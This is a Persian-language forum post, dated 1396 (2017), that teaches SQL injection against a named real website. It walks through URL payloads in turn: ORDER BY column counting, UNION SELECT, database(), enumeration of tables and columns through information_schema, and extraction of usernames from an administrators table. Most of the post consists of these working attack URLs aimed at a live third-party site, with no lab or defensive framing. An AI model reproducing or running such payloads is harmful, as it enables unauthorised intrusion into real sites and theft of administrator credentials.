تو این تاپیک میخوام اموزش نفوذ به یک تارگت رو به شما عزیزان نشون بدم امیدوار که بهتون کمک کنه البته شما ماشاالله همه استادید و ما شاگرد:30:
ممنونم از xenotix عزیز که اجازه دادن بنده اموزشات خود را در اختیارتون بگذارم
لطفا تاپیک رو حذف نکنید با مدیر محترم هماهنگ شده!!!:45:heart
صرفا جهت اطلاع:دوستان عبارت (20%)همون فاصله هست میتونید به جاش از فاصله یا + استفاده کنید.
وه عبارت(27%)همون سینگل کوتیشن هست(')
سعی میکنم به صورت ساده اموزش بدم با اجازه ی اساتید محترم:
کد HTML:
http://www.bible-history.com/subcat.php?id=2
این تارگت ماست
کد HTML:
http://www.bible-history.com/subcat.php?id=2%20order%20by%201--
خب حالا ما عدد یا محدودیه جداول رو پیدا کردیم میریم سراغ قسمت بعدی یا نمایش اعداد:
کد HTML:
http://www.bible-history.com/subcat.php?id=2%20and%201=0%20union%20select%201--
حالا نام دیتا بیس را پیدا می کنیم:
کد HTML:
http://www.bible-history.com/subcat.php?id=2%20and%201=0%20union%20select%20database()--
نام دیتا بیس ما هست:bible_history
خب حالا ما باید جداول یا تیبل هایی که در این دیتابیس ذخیره هستن پیدا کنیم:
کد HTML:
http://www.bible-history.com/subcat.php?id=2%20and%201=0%20union%20select%20%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27bible_history%27--
خب این دستور میگه که تمام جداولی که در دیتابیس کلی(information_schema)قرار داره رو به من بده بعد دوباره میگه نه وایسا برو تو دیتابیس مورد نظر(bible_history) تیبل هاشو بهم نشون بده میگه چشم!
ما میگردیم جدولی که مربوط به یوزر یا هست پیدا میکنیم و در اینجا جدول مورد نظر ما(administrators)هست!
خب حالا باید بریم تو این جدول وه ستون های(columns) این جدول رو بیرون بکشیم!
کد HTML:
http://www.bible-history.com/subcat.php?id=2%20and%201=0%20union%20select%20%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27administrators%27--
خب دوستان گلم ما فقط کافیه به جای (table_name)میگیم(column_name)رو به ما بده و میگیم در دیتا بیس کلی (information_schema) اون بالا گفتی تیبل ها(tables) رو بهمون بده الان میگیم ستون هارو بهمون بده(columns) بعد دوباره میگیم نه نه وایسا ستون های جایی رو نشون بده که اسم جولش هست('table_name='administrators)اونم میگه چشم!
با اجرای ادرس بالا میبینید که حالا ما ستون یا اطلاعات مربوط به تیبل مورد نظر(administrators)رو داریم
خب حالا باید بهش دستور بدیم داده های(data) درون هر کدوم از این ستون ها (columns) رو به ما نشون بده !
داده(data)ما اینا هستن(admin_id,admin_username,admin_password,ad min_first_name,admin_last_name)
خب حالا میریم سراغ دومین ادرسی که گفتیم و عملیات رو رویه اون دستور انجام میدیم:
کد HTML:
http://www.bible-history.com/subcat.php?id=2%20and%201=0%20union%20select%20%201%20from%20administrators--
خب حالا بعد از اعدادمون که اینجا 1 هست باید از این دستور استفاده کنیم(from)وه بهش میگم نشون بده به ما از یا همون(from) در تیبل یا جدول(administrators)خب حالا کافیه بجای عدد یک هر کدوم از داده ها رو که ما بدست اوردیم رو بزارید مثلا ما میخوایم یوزر نیم ادمین رو بدست بیاریم(admin_username)
کد HTML:
http://www.bible-history.com/subcat.php?id=2%20and%201=0%20union%20select%20%20admin_username%20from%20administrators--
به امید روزای بهتر
برچسب:
نویسنده: محمد رضا جوادیان
تاريخ: سه
شنبه
17 مرداد
1396 ساعت: 8:18